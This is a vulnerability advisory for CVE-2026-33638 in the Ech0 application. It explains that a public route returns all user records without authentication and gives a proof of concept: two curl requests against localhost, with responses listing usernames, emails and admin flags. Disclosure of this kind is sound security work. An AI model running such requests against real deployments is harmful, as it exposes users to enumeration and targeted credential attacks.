CVE-2026-33638

Description

## Summary `GET /api/allusers` is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata. ## Details The route is registered under public routes: - `internal/router/user.go:17` - `appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())` The handler itself is documented as requiring authentication: - `internal/handler/user/user.go:177-185` - API docs/annotations indicate auth requirement (`@Security ApiKeyAuth`). ## PoC ### 1) Negative control: endpoint that should require auth Request: ```bash curl -i "http://localhost:6277/api/user" ``` Response: ```bash HTTP/1.1 401 Unauthorized Access-Control-Allow-Headers: * Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0 Content-Language: zh-CN Content-Type: application/json; charset=utf-8 Expires: 0 Pragma: no-cache Surrogate-Control: no-store Date: Sun, 22 Mar 2026 07:21:22 GMT Content-Length: 135 {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null} ``` ### 2) Trigger: call public user-list endpoint without auth Request: ```bash curl -i "http://localhost:6277/api/allusers" ``` Response: ```bash HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Content-Language: zh-CN Content-Type: application/json; charset=utf-8 Date: Sun, 22 Mar 2026 07:21:56 GMT Content-Length: 912 {"code":1,"msg":"获取用户列表成功","data":[{"id":"019d144a-18fa-7db3-a2dd-310604210abd","username":"h1_poc_1774161893_1","email":"[email protected]","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-1904-7c0a-98ec-656079a82c64","username":"h1_poc_1774161893_2","email":"[email protected]","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-190b-70f8-89cb-4f8ab46cec9b","username":"h1_poc_1774161893_3","email":"[email protected]","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7dc-7cef-9395-4d0e392a5278","username":"alice","email":"[email protected]","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7e3-79f3-bb09-0ea758333a54","username":"bob","email":"[email protected]","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"}]} ``` ## Impact **Vulnerability type:** Access control bypass / unauthenticated data exposure. **Who is impacted:** Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated. **Business/security impact:** Enables account reconnaissance and targeted credential attacks. A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.

Priority Score